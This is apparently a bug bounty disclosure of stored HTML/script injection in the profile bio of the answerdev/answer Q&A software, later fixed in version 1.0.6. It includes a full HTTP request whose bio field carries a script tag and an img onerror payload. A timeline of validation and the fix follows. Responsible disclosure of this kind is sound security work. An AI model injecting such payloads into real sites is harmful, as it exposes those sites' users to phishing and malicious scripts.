Valid

Reported on

Feb 21st 2023


Description

HTML injection in user profile

Vulnerability is in: http://34.245.133.152:9080/users/settings/profile - About Me

Proof of Concept

Request:

PUT /answer/api/v1/user/info HTTP/1.1
Host: localhost:9080
Content-Length: 213
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
Content-Type: application/json
Accept-Language: en_US
sec-ch-ua-mobile: ?0
Authorization: ec83deeb-b2cf-11ed-b0f7-0242ac110002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:9080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9080/users/settings/profile
Accept-Encoding: gzip, deflate
Connection: close

{"display_name":"admin","username":"adminn","avatar":{"type":"default","gravatar":"","custom":""},"bio":"<script>alert(1)<\\x00/script>\n<style></style><img src=x onerror=alert(1)//\">","website":"","location":""}

Impact

Html injection vulnerability in profile - Hacker could also use the injected code to modify the content of the page, making it appear legitimate but actually serving up phishing or malware content.

We are processing your report and will contact the answerdev/answer team within 24 hours. 9 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 9 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 9 months ago
hatlesswizard modified the report
9 months ago
joyqi validated this vulnerability 9 months ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
joyqi marked this as fixed in 1.0.6 with commit 71a4cd 9 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
joyqi published this vulnerability 9 months ago
to join this conversation